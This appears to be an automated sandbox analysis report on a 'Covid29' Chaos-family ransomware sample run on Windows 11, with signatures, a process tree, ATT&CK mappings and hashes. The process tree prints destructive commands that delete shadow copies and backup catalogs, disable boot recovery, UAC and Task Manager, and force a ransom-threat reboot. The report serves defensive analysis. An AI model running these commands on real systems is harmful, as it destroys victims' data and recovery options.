Resubmissions
25/03/2025, 20:32
250325-za94cawjy9 1025/03/2025, 20:27
250325-y8rtzsssax 1025/03/2025, 20:24
250325-y66v5a11hv 1025/03/2025, 20:20
250325-y4nlrs11dy 725/03/2025, 20:16
250325-y2jj2a11bz 725/03/2025, 20:12
250325-yys93a1zfw 625/03/2025, 20:08
250325-ywskravqw6 8Analysis
-
max time kernel
171s -
max time network
172s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
-
submitted
25/03/2025, 20:27
General
-
Target
http://Google.com
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 4 IoCs
-
Chaos family
-
UAC bypass 3 TTPs 2 IoCs
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
-
Executes dropped EXE 4 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 3 IoCs
-
Modifies registry key 1 TTPs 7 IoCs
-
NTFS ADS 1 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 47 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 33 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://Google.com1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff80c53dcf8,0x7ff80c53dd04,0x7ff80c53dd102⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1948,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1940 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1440,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2244 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2284,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2352 /prefetch:132⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3144 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3176 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4260 /prefetch:92⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4236,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4644 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5144,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5160 /prefetch:142⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5272,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5164 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5644,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5424 /prefetch:142⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4404,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5268 /prefetch:142⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5504 /prefetch:142⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5424,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5500 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5856,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5748 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5916,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5940 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6072,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6124 /prefetch:122⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6268,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6280 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6440,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6428 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5556,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6700 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6368,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6404 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6360,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6812 /prefetch:142⤵
- NTFS ADS
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=6836,i,17682393794523491163,16973524673208519717,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5588 /prefetch:102⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004EC1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\readme.txt1⤵
-
C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ACD0.tmp\TrojanRansomCovid29.bat" "2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ACD0.tmp\fakeerror.vbs"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 23⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Users\Admin\AppData\Local\Temp\ACD0.tmp\mbr.exembr.exe3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\ACD0.tmp\Cov29Cry.exeCov29Cry.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt5⤵
-
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 93⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\ACD0.tmp\Cov29LockScreen.exeCov29LockScreen.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
3Pre-OS Boot
1Bootkit
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Query Registry
3Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD54d2e5180be7f20be95096880294e58bf
SHA1f48729a93b0cc81b7b5b70650f77e5eeb83ffd02
SHA256d70537c023e3477b47cb5476b33e87196dabb390ad121549e84ee807ae5740fb
SHA5128d3e4762320ec4f728729f819d27fcf00e74286dbc794ece4c9646fdd9ef7680b10cc8c7609bc02611b03ff97086af80ac2255697dfcfdf33bd363eadaf090fd
-
Filesize
649B
MD5c7c47fe40c1e20f9a6d7c5442b74ad77
SHA172f900d7b59eb4e9c58b5c2857ca135dac7237e3
SHA256609b2d6902a807d7d8e8d2ba0c7a6d31cf9fd56a49a3d8a411e1a4647cdb07eb
SHA512b580c1c42d20486d6edb25b500b365faa1f2c5ccc6c1066becb4d7c4726aa9bcffeb062fb1eefb8d31dc5b1c99259f23772d644eafec2a2875d10130926674f2
-
Filesize
4KB
MD5d87d3dbe07e1a0822fc5d70ad1dd7706
SHA10f46fb8a77c1b4f25915b867f7c8a42feeda4378
SHA2560255e9720a9018999f063208a9c27db9410d0fecc1e49da28beca746def2c63c
SHA5127b3986b2cde300f19afd8916df4b8517599ec1800608cfe50c46f773f8295d7150e7cf1fe97fa229ea05a351ee3bdce26b4eca6b3dc7707ddd86dd7d249bd311
-
Filesize
2KB
MD59ea3e2b59ac8311e957e4fc2cbaac606
SHA1549c8b29e7dbee3106c156553fe44e42ad4b6d36
SHA256d9153b3ead2e6ffd16ee72620b17bb195c44152c9052d3d17b22f0a832d09ea5
SHA512d8b1d741770edde03cc62a6120e19eeaa299b46b4a39b02e17ca993410acada9f803ffdb91997124e223cf6b62a82f2b6eb243e337554e597e04e38d0cbb5df9
-
Filesize
15KB
MD5177732d967e0b5a1dffb7707ad23f2a8
SHA1a62a7d74a12e8e2ca10ab694efd2d1b9e3f78bcd
SHA2565a74f4e45182a72bb21a8731178a0272b37e32525638725e7e985e54f1d78ae6
SHA5128e24b526fbefaff6be6655a57e949e6b8adb9032197ca9b5c23d226145f096e2bf2c1fa6c5d3b1a9a46e9a7b0083b93b1db35db449eda842cc741fef8ab25b78
-
Filesize
14KB
MD5c5408c67a9370551d535b0ff06b70732
SHA17b4c16656fa6cc7a84580e1bb8bd5b982c9a1212
SHA256e938d9b552cd541d9768a914921516ce3e8a6a3dc8792a2757239fb1a053a44f
SHA5127c00c66beb64d8b1baf2f2822cc1b669e03cb93f16149c02531398ee1c18e7703e7982dbebe3fc59550ef7c9368b5f85813bb04487b210928a179367e1ef4bcf
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
10KB
MD5ab5bc7d244f2712db485fa7bd9ad74e1
SHA1e4688c0d825cb8a15a989c430f2eb06393b58522
SHA25685e6d965a3933da2b5098e103e4e45189e75b41b8e8c24082352fbaa07a8eb44
SHA5123cb59d761bacb31490c9787a50e3bcaceb7c33d5c346a6e796c4d80424e2e888c662041cf57523c89dff8af3a6e75e3394119895f514b73402cf5b93b9f2258e
-
Filesize
11KB
MD5f72feb8ec1cff9c02824824fd5ac3c6a
SHA1057b46183ede222f31f4b0fb31ab1c9dc4485cb3
SHA2565cb7481a5e261d46c80125e90d1b18e05ba20a0dd04e36ce5d43721fc31f30bc
SHA5121488e04037f61782c0c2a8687d8de9f7d156148d0a10065e10d715f382211b97e4e334bc137b5337e61d959274e23279aea76207ae820c18db8f50c075302578
-
Filesize
12KB
MD589908dcbc5d3684c0059d2290f839273
SHA179c78092553188b07f582ed74351e69ec0a47f26
SHA25698f542cfeab4c89d4fa683352335c063d89d61766550b750a7306638bc969fac
SHA5129d11981a1599e357c35319763da1dca36a117604b0d6d42ca116d716167825c194310be9d5d0625e436b14b5c3e6882debf2bbfbf4465994f390d638993edb1e
-
Filesize
10KB
MD5706a0e121c2eec905e573a855b73b4eb
SHA11fe5c4b56e7c343b18aa2e6f9908344390d865fe
SHA256ea9923cf138e86e8d022febdb1245827e15acedbf0cde0ec2190c9f4a3ea89fd
SHA51234332f3fc258d0cbc060dc4a4a252f08986a23d58294c65f0ef8d3bd3cce4ef61c10845b39675898ff88736f82285495bb05fd6db66cd58114df761b84f4a33d
-
Filesize
12KB
MD595aa681b061457dd5e331e2054b9b4b9
SHA187571137dc79bc32791a40f2dcdc82b720ada490
SHA2562f20b8fc69774a1d5d8e5bf91bc2771049507f1270b26291080a71dd74b1356a
SHA5121ca40b614d5f32127f8166b33cb10b7c6b069dae463404e5d4cf1c6e74e3b9c755127dbfa91a015e2f608dd62af895d7bcbb827f8934f47a3b58617ac613b3e2
-
Filesize
11KB
MD5584f63ad8491a4566647b012e278af13
SHA195b282228b337a32d4caeb7655abd42cef6c411c
SHA256a5d1abc56dfdbb45af06454bfa5c2a3eaa0920f1d95e59186c35547b0d079c00
SHA512bccc08bce066c3998152c5e2f63f5bd11b834e62c27d921738d4ee44885e0625826c9d84d2f4230708a0f964d93ea1fd6343a73b04347707eac936e0a079b280
-
Filesize
11KB
MD52c0ed283955e63431ae3d979c4374175
SHA150f716fd320cbe33b118d90e3a99e479d549f678
SHA25665bc07fcd8062e9bc541b985c67c27d9c882b6fb694e5878e6266f76a0ef9101
SHA5120941e3750a481fbfd3b3a0cb977ee07b85b5f5cfea907f7e3493691105f547e845bc16a0dd7005d815a5f758dad9e559a44bd0373f583170cc0fc75467db4066
-
Filesize
15KB
MD5a8bb56ecfe871b00ae826bbd7b4a6fd0
SHA16a276534042dbb3960221f93b25f02c749a66145
SHA2562b0bfc928ea1bb191367c5d9d0ee0f850c78fbd248395df56ad9feb64ee92090
SHA5125078e3ee603f7e08f7d3537c2cd4bc7891f3550fdb3be0498c0cbfeb6baea202b756d1b7dae2053f3fd64e05e1249ca6150fd16b6fea350a8ccdb1fe21ca5f18
-
Filesize
72B
MD52c184ddbd1b189760e2c6956ceda41ac
SHA1fbb3cda04302c595a7e7071a011af2bb3324241e
SHA256b19f9dce065127f8a3b80c1c4faf7f58736f280c474d2676aa1d2776c94139b7
SHA512793b057a873b00872de6c9600fc41d6d80b39d8fb0a330d44f700f6710b8e25ee35c3264f8207099d94c75e5dee8b4524cd46753949f55707ce4ade591a110e0
-
Filesize
48B
MD5c2e4ffc2c345d649e72a1eb0fb28501a
SHA1ca436be0c4dea920b036296c071fa2226f1c0282
SHA25680897ece69ddfa60c167c5470f9acbf95e679b22dbb217ce331dffb74f574e6a
SHA5126489b45332d83b2cde6e9838ef09b33b21cf00cf291ab7af5c22db0ce4201b165ebd12c6928e01e610e6a920ddcc018a9ad613da149d4bdf33b9237461ee6eff
-
Filesize
76B
MD5a7a2f6dbe4e14a9267f786d0d5e06097
SHA15513aebb0bda58551acacbfc338d903316851a7b
SHA256dd9045ea2f3beaf0282320db70fdf395854071bf212ad747e8765837ec390cbc
SHA512aa5d81e7ee3a646afec55aee5435dc84fe06d84d3e7e1c45c934f258292c0c4dc2f2853a13d2f2b37a98fe2f1dcc7639eacf51b09e7dcccb2e29c2cbd3ba1835
-
Filesize
140B
MD5bfc9be05c3b96536b76fe5b4e25e8c6c
SHA18d5578bbbfa6af1e278416d1b775de4f10c73e9a
SHA25604bbeaf5830db726dfaa8f1c751f0a22ec912b0a81f55c44b9f6dd2b493376c0
SHA5120cf5a14f71b696e1ab247b54837a29b9dfdf931bddb7de6fb79441afbf448d2a9ed3856b3deec978a8260c8648a4eed8d4a49a90b628d5af1b739f1651057b6f
-
Filesize
81KB
MD517e35d62c5242a024c31dccebff08c34
SHA18faaa02a1de4389fdb1326eacce144131e0a6d6d
SHA256ee0cf1c5b84f56feecfeaf3cf731c58b9f93b97fac9d9458dcdbba9d52a3bc7b
